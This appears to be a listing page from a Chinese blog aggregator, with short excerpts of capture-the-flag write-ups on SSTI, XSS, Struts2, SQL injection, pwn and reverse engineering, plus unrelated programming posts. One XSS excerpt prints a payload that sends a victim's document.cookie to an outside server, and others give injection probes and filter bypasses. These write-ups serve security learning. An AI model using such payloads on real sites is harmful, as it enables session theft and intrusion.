ctf

CTFSHOW】web入门 SSTI(更新中)

文章目录引言web361web362web363参考资料引言刷完SSRF、XSS,来学学SSTIweb361首先测试出get的参数名为:name。记得之前刷题时保存过一张大佬总结的测试流程图:根据图片规则进行测试:?name={{1*'4'}}返回结果:4则题目考察的很有可能是基于Jinja2的flask框架。payload:对于python3:(题目使用的是python3)使用popen函数:?
TurkeyMan·2023-11-22 15:16

ctfshow刷题 [struts2]

目录一、Web279-S2-001二、Web280--S2-005三、Web281--s2-008四、Web301-代码审计五、Web302-代码审计六、Web303-代码审计七:网鼎杯:朱雀组开启靶机八、Xss九、Web78文件包含一、Web279-S2-001题目分析:如题s2-001是一个struts2命令执行漏洞编号一、判断网站是否基于Struts2的方法1、通过网页后缀来判断,如.do.
路向阳_·2023-11-22 15:46

【Web】Flask|Jinja2 SSTI

目录①[NISACTF2022]issecret②[HNCTF2022WEEK2]ez_SSTI③[GDOUCTF2023]④[NCTF2018]flask真香⑤[安洵杯2020]NormalSSTI⑥
Z3r4y·2023-11-22 15:13

【Web】Ctfshow Nodejs刷题记录

①web334②web335③web336④web337⑤web338⑥web339⑦web340⑧web341⑨web342-343⑩web344①web334进来是一个登录界面下载附件,简单代码审计表单传ctfshow123456
Z3r4y·2023-11-22 15:13

【Web】NodeJs相关例题wp

目录①[GKCTF2020]ez三剑客-easynode②[MoeCTF2021]fakegame③[安洵杯2020]Validator④[HZNUCTF2023final]eznode⑤[CNSS]EzPollution_pre⑥
Z3r4y·2023-11-22 15:13

ctfshow XSS刷题总结

简介这次把爪牙伸到了xss嘿嘿嘿开始日咯!web316用xss平台怎么也爆不出。。。可能是姿势不对用最原始的方法吧在自己的服务器上写一个hack.phpdocument.location.href='http://wgm1yk1.nat.ipyingshe.com/x.php?1='+document.cookieweb317今天学习了一款xss自动扫描的工具XSStrike似乎很好用的呢直接跑出
b1ue0cean·2023-11-22 15:42

CTFSHOW XSS漏洞

这篇文章记录了我刷题的过程,是ctf.show上的XSS漏洞,第316-第333推荐一篇文章:XSS总结-先知社区这篇文章列举一些自动触发的payload,可以收藏起来。
貌美不及玲珑心,贤妻扶我青云志·2023-11-22 15:42

ctfshow-xss

316-326反射型期间有过滤script、img、空格、iframe的,不一一赘述,以下payload通316-326。存储型327因为要的是管理员cookie,收件人猜测填写admin,在邮件内容插入payload328管理员登录时,会看到所有用户的用户名和密码,只要注册一个带有xss代码的用户即可,当管理员访问该页面,就会执行在密码或者用户名插入payload都行,网站没有验证输入合法性。获
Vin0sen·2023-11-22 15:38

3-8 靶场 / php / docker

今日目标:两个漏洞资料查找,及博文复现,实操ctf靶场实践php语言基础,docker基础ctf靶场实践备注:该类型靶场为在线靶场,无需自己搭建搭建环境,部分靶场有解题思路分享,适合初学入门做记录做题思路和流程
Life And Death War·2023-11-22 15:08

CTF介绍

题目类型在CTF中主要包含以下5个大类的题目,有些比赛会根据自己的侧重点单独添加某个分类,例如移动设备(Mobile),电子取证(Forensics)等,近年来也会出来混合类型的题目,例如在Web中存在一个二进制程序
Vin0sen·2023-11-22 15:08

零基础小白如何入门CTF,看这一篇就够了(附学习笔记、靶场、工具包)

CTF简介:CTF(CaptureTheFlag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。
千·寻·2023-11-22 14:36

【Web】Ctfshow XSS刷题记录

目录反射型XSS①web316②web317-319③web320-322④web323-326存储型XSS①web327②web328③web329④web330⑤web331⑥web332-333反射型XSS①web316直接输入alert(1),能弹窗。xss题目一般会有个bot,可以触发你的xss代码。如果直接获取cookie只能拿到自己的,这里提示要拿到admin的。payload:wi
Z3r4y·2023-11-22 14:05

零基础小白要如何入门CTF,看着一篇就够了(附学习笔记、靶场、工具包)

CTF简介:CTF(CaptureTheFlag)中文一般译作夺旗赛,在网络安全领域中指的是网络安全技术人员之间进行技术竞技的一种比赛形式。
千·寻·2023-11-22 14:05

Python连接hive数据中遇到的各种坑

安装目录的bin目录下(your_path/apache-hive-1.2.2-bin/bin/hiveserver2)输入hiveserver2&回车fromimpala.dbapiimportconnectfromimpa
JRighte·2023-11-22 12:23

python 工厂方法模式原理与实现

二、工厂方法模式的主要角色抽象工厂(AbstractFactory):提供了创建产品的接口,调用者通过它访问具体工厂的工厂方法newProduct()来创建产品。
花开花落与云卷云舒·2023-11-22 09:02

抽象工厂设计模式是什么?什么是 Abstract Factory 抽象工厂设计模式?Python 抽象工厂设计模式示例代码

什么是AbstractFactory抽象工厂设计模式?抽象工厂设计模式是一种创建型设计模式,旨在提供一个创建一系列相关或相互依赖对象的接口,而无需指定其具体类。
天河书阁 VicRestart·2023-11-22 09:20

[GFCTF 2021]wordy 编写去花IDAPYTHON

首先查壳发现没有东西然后放入ida发现没有main并且软件混乱发现这里1144的地方出错IDA无法识别数据报错内容是EBFF机器码这里看了wp知道是很常见的花指令所以我们现在开始去花这里因为我们需要取出EBFF下面的地址也都是EBFF所以工作量大使用IDApython脚本即可start=0x1135end=0x3100foriinrange(start,end):ifget_wide_byte(i
双层小牛堡·2023-11-22 09:19

[SWPUCTF 2021 新生赛]非常简单的逻辑题 // %的逆向

代码解密题flag='xxxxxxxxxxxxxxxxxxxxx's='wesyvbniazxchjko1973652048@$+-&*'result='v0b9n1nkajz@j0c4jjo3oi1h1i937b395i5y5e0e$i'flag=''foriinrange(len(result)//2):forjinrange(33,125):s1=j//17s2=j%17a=(s1+i)%3
双层小牛堡·2023-11-22 09:19

[SWPUCTF 2021 新生赛]fakerandom

分析代码importrandomflag='xxxxxxxxxxxxxxxxxxxx'random.seed(1)l=[]foriinrange(4):l.append(random.getrandbits(8))result=[]foriinrange(len(l)):random.seed(l[i])forninrange(5):result.append(ord(flag[i*5+n])^r
双层小牛堡·2023-11-22 09:49

[SWPUCTF 2021 新生赛]简简单单的逻辑-- 算法逆向

flag='xxxxxxxxxxxxxxxxxx'list=[47,138,127,57,117,188,51,143,17,84,42,135,76,105,28,169,25]result=''foriinrange(len(list)):key=(list[i]>>4)+((list[i]&0xf)>4)+((list[i]&0xf)>4)+((list[i]&0xf)>4)的解释这里是获取
双层小牛堡·2023-11-22 09:15

[github初学者教程] 分支管理-以及问题解决

荣誉:阿里云博客专家认证、腾讯开发者社区优质创作者,在CTF省赛校赛多次取得好成绩。跨领域学习,喜欢摄影、弹吉他、咏春拳。文章深入浅出、语言风趣;爱吃必胜客社区创立者,旨在“发现美欣赏美学习系列专栏。
新西兰技术大佬·2023-11-22 08:40

[iOS]CoreText 学习笔记(1)

按照以上原则,将CTDisplayView中的部分内容拆开,由4个类构成:CTFrameParserConfig类,用于配置绘制的参数,例如:文字颜色,大小,行间距等。
庞敬宇·2023-11-22 06:26

2017 IOS 关于CoreText的笔记

CGSize)sizeoptions:(NSStringDrawingOptions)optionscontext:(nullableNSStringDrawingContext*)context2.使用CTFrameRef
国宝大人·2023-11-22 06:53

IOS 关于CoreText的笔记

CGSize)sizeoptions:(NSStringDrawingOptions)optionscontext:(nullableNSStringDrawingContext*)context2.使用CTFrameRef
国宝大人·2023-11-22 06:13

“百度杯”CTF比赛 九月场SQL

题目描述解题工具;浏览器:火狐浏览器工具;火狐浏览器插件HackBar题目界面;每个人的url都是不一样的,随机根据系统生成的。image.png刚开始输入and1=1发现被拦截,截图如下第一步尝试接着测试or1=1情况是一样的第二步尝试我们使用字符&&和||替换and和or第三步尝试发现成功绕过Ok,接下来猜字段长度第一步尝试发现orderby被拦截同样注释/**/也会被拦截。尝试用der隔开是
潘雪雯·2023-11-22 05:10

SCTF2021 pwn Christmas Bash 出题思路+预期解

SCTF2021pwnChristmasBash出题思路+预期解sctf2021pwn出题思路赛题文件+exp:github文章目录SCTF2021pwnChristmasBash出题思路+预期解题目描述
-令则·2023-11-22 05:36

sctf2021 data leak 出题思路和题解

sctf2021dataleak出题思路和题解sctf2021pwn出题思路文章目录sctf2021dataleak出题思路和题解题目描述出题思路漏洞位置内存布局远程exp题目描述Nevertrustcpointermagicandescapecharacters
-令则·2023-11-22 05:06

SCTF2021 pwn Christmas Wishes 出题思路+预期解

SCTF2021pwnChristmasWishes出题思路+预期解sctf2021pwn出题思路赛题文件+exp:github文章目录SCTF2021pwnChristmasWishes出题思路+预期解题目描述出题思路调试方案
-令则·2023-11-22 05:06

SCTF2021 pwn Christmas Song 出题思路+预期解

SCTF2021pwnChristmasSong出题思路+预期解sctf2021pwn出题思路文章目录SCTF2021pwnChristmasSong出题思路+预期解题目描述Slang-christmas
-令则·2023-11-22 05:36

SCTF2021_Pwn_dataleak_WP

SCTF2021_dataleak_WP文章目录SCTF2021_dataleak_WP检查文件和保护ida查看ELF文件cJSON_PWNida查看libcjson.so利用思路exploit检查文件和保护
Benson233·2023-11-22 05:35

SCTF2021 pwn gadget 出题思路+预期非预期解

SCTF2021pwngadget出题思路+预期非预期解sctf2021pwn出题思路文章目录SCTF2021pwngadget出题思路+预期非预期解编译环境ora思路gadget出题考点栈迁移movrdx
-令则·2023-11-22 05:35

[SCTF2021 misc] this_is_A_tree

一般不参加两天的比赛,因为太难了。不过也有容易的,这个就是名字说这是个树,打开文件是一个文件两个目录,目录下也是同样的结构,就是一个二叉树。然后用程序遍历了一下,因为最右有base64尾标记==所以肯定不是后根,猜先根。一下就成功了importosfrompwnimport*data=b''#先根遍历defgetdata(d):globaldatatmp=open(d+'/data','rb').
石氏是时试·2023-11-22 05:05

2021SCTF

前言复现环境:NSSCTF总结第一个就是学到了RCEME中绕过disabled_function和无参数rce的方法第二个就是找反序列化链子upload1和upload2都是找yii的反序列化链子,$可控
Z3eyOnd·2023-11-22 05:03

NSSCTF web刷题记录6

文章目录[HZNUCTF2023final]eznode[MoeCTF2021]地狱通讯-改[红明谷CTF2022]SmartyCalculator方法一CVE-2021-26120方法二CVE-2021
_rev1ve·2023-11-22 05:02

[SCTF 2021]rceme 复现

前言做题做到这道题,又学到了新的无参rce利用的技巧以及绕过disable_fucntion的技巧知识点无参rce无字母数字rceiconv绕过disable_function可变参数数组表示字符串复现过程源码|\$|\?|\^|&|\|/ixm',$code)){die('alert(\'Tryharder!\');history.back()');}elseif(';'===preg_repl
绮洛Ki1ro·2023-11-22 05:32

SCTF2021__rceme

rceme文章目录rceme先说下几个函数call_user_funcgetallheaders()可变参数绕过命令注入使用动态链接库so绕过disable_functionsiconv_open函数执行过程利用php原生类进行文件读取参考链接题目|\$|\?|\^|&|\|/ixm',$code)){die('alert(\'Tryharder!\');history.back()');}els
Sk1y·2023-11-22 05:30

SCTF 2021 | 冰天雪地 极限比拼

SCTF2021喊你来解锁圣诞限定赛事啦!!!
Cyberpeace·2023-11-22 05:30

[SCTF 2021]rceme

文章目录前置知识可变参数绕过create_function注入无字母数字RCE动态链接库so绕过disable_functions利用php原生类进行文件读取解题过程前置知识可变参数绕过PHP在用户自定义函数中支持可变数量的参数列表。在PHP5.6及以上的版本中,由…语法实现;在PHP5.5及更早版本中,使用函数func_num_args(),func_get_arg(),和func_get_ar
_rev1ve·2023-11-22 05:59

SquareCTF-2023 Web Writeups

官方wp:CTFtime.org/SquareCTF2023tasksandwriteupssandboxDescription:I“made”“a”“python”“sandbox”“”“”nc184.72.87.98008
Jay 17·2023-11-22 04:37

S3图片上传、删除等函数的使用

AWSS3PutObjectRequest*getLog=[[AWSS3PutObjectRequestalloc]init];getLog.bucket=[[UserInfoshareUserInfo].originalobjectForKey
拂溪·2023-11-22 04:03

第三届VECCTF-2023 Web方向部分wp

其它一些路由没什么用git泄露拿下一堆码pythonGitHack.py-uhttp://5df532dc3246cce9.node.nsctf.cn/.git///跑的时候不要动他。
Jay 17·2023-11-22 04:35

CTF-栈溢出-基本ROP-【ret2syscall】

文章目录ret2syscallBxMCTF2023Anti-Libcmainwrite_bufflush_obufreadintread_buf思路expret2syscall即控制程序执行系统调用,获取
看星猩的柴狗·2023-11-22 02:56

第一周学习

站只有妳想不到的沒有妳玩不到的午夜必備神器激情互動♥共享資源java,python,c++應有盡有類型齊全全棧工程,傳統寫bug,海到晚上睡不著♥https://www.github.com快來體驗壹下吧有頭髮勿入第一部分题目[BJDCTF2020
不才有山吧·2023-11-22 02:25

BUUCTF--[ACTF2020 新生赛]Include

目录1、本题详解2、延伸拓展1、本题详解访问题目链接有一个tips的链接,我们点击请求了file,内容是flag.php的内容:Canyoufindouttheflag?尝试请求一下index.php并没有发现什么信息flag.php也没发现什么尝试爆破一下它的目录和一些敏感文件名但是遇到429报错,请求被服务器拒绝,因为发送了太多请求想起题目名叫Include,应该考察的是文件包含,因此尝试使用
Myon⁶·2023-11-22 02:46

解决error while loading shared libraries: libicui18n.so.55: cannot open shared object file

编译报错:dtools:errorwhileloadingsharedlibraries:libicui18n.so.55:cannotopensharedobjectfile:Nosuchfileordirectoryninja
holly_huang·2023-11-22 00:53

【github】初学者使用指南

荣誉:阿里云博客专家认证、腾讯开发者社区优质创作者,在CTF省赛校赛多次取得好成绩。跨领域学习,喜欢摄影、弹吉他、咏春拳。文章深入浅出、语言风趣;爱吃必胜客社区创立者,旨在“发现美欣赏美学习系列专栏。
新西兰技术大佬·2023-11-22 00:37

webshell(下)

加密函数与自写加密函数openssl加密函数:openssl_encrypt方法详解:openssl_decrypt方法详解:函数基本使用:实际利用:自己写加密算法这种方式也比较简单,在很多ctf题目中都喜欢考与
星了个星·2023-11-21 20:55

error while loading shared libraries的解决方案

Null_Value的博客-CSDN博客当运行程序时会出现如下类似错误时:errorwhileloadingsharedlibraries:libXXXXXXX.so.1:cannotopensharedobjectfile
Jiqiang_z·2023-11-21 20:19

第四周所学

总结:参加了ctf校赛,很刺激,很好玩,也体验了一把蹲大牢的感觉学习了简单的sql注入,进一步了解了一句话木马,还掌握了一些正则匹配,弱口令爆破,以及一些最简单的逆向入门1.攻防世界batmanweb(
ANYOUZHEN·2023-11-21 17:39

第八周所学

1.buuctfMD5flag{admin1}2.buuctf一眼就解密3.buuctfurl编码4.buuctf看我回旋踢5.buuctf摩斯6.buuctfpasswordflag{zs19900315
ANYOUZHEN·2023-11-21 17:39
上一页 59 60 61 62 63 64 65 66 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他